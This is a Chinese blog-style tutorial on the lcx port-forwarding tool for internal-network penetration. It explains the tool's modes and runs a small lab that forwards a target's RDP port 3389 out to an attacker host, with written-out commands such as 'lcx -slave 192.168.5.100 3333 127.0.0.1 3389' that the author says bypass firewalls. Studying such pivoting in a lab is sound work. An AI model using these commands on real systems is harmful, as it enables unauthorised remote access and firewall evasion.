LCX使用心得

最近在搞内网渗透，碰到 端口转发&边界处理 的时候，我们就可以借助一些小工具了，这类工具有很多，这里主要说明lcx的用法。

lcx是个很老的端口转发工具，而它的使用也很简单。不过想要把lcx玩清楚，首先要明白端口转发是什么意思，以及我们为什么要做端口转发。

咳咳，说了一堆废话！！

好的，接下来进入正题。首先来了解一下端口转发这个东东~~

1.本机和靶机处于同一个内网、本机和靶机都处于外网 、本机处于内网，靶机处于外网。

• 这种情况下我们直接进行连接即可。

2.本机处于外网，靶机处于内网。

• 这个时候我们就需要将靶机的3389转发至本机的端口(未被占用)。
• 此时我们连接本机被转发的端口就可以连接到处于内网环境的靶机。

3.本机处于内网，靶机处于另一个内网。

• 这种情况下需要将本机的端口映射出去。
• 在将靶机的3389转发出来。
• 与2相比就多了一个步骤：将本机端口映射到外网。

这里再说一下lcx的用法：

　　-listen 3333 2222

　　#  监听本机的3333端口并将数据转发到2222端口

　　-tran 3333  127.0.0.1 3389
　　#  在主机上运行远程桌面，连接目标机的3333端口，可以连接到主机的3389端口。

　　目标机上运行：lcx -tran 3333  192.168.125.102 3389   其中192.168.125.102是第三台机。
　　#  在主机上运行远程桌面，连接目标机的3333端口，可以连接到第三台机的3389端口。

　　-slave 192.168.5.100 3333 127.0.0.1 3389

　　将本机的3389的数据转发到192.168.5.100的3333端口

下面开始实战：

环境配置(环境简陋~~)：

　　本机：win2008：192.168.5.100(模拟外网服务器)

　　靶机：winXP：192.168.5.102

首先在本机上运行：　　　

lcx -listen 3333 2222
# 监听本机的3333端口然后将数据转发到2222端口上。

　　 

在靶机上运行：　　

lcx -slave 192.168.5.100 3333 127.0.0.1 3389
# 靶机自愿将自己的3389端口数据转发至192.168.5.100的3333端口。
# 因为这里是靶机"自愿"的，所以可以穿透防火墙。

　　

本机连接本机的2222端口(相当于连接到靶机的3389端口)

　　

　　

　　 

大功告成！！！不知道为什么看到这个界面心情莫名的激动！！